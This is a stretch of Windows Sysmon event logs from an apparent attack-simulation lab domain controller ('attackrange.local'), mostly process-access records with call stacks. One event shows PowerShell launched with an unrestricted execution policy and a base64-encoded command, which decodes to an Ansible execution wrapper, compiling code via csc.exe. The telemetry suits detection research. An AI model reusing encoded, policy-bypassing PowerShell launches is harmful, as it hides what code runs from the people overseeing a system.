13:52:23.665{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-8517-5FCF-C402-000000009001}41562496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FFA6832CBBF) 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.626{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4njdtpfc.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.618{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4njdtpfc.cmdline2020-12-08 13:52:23.618 11241100x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:23.618{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4njdtpfc.dll2020-12-08 13:52:23.618 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8517-5FCF-C502-000000009001}4488C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.149{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-8517-5FCF-C502-000000009001}4488C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 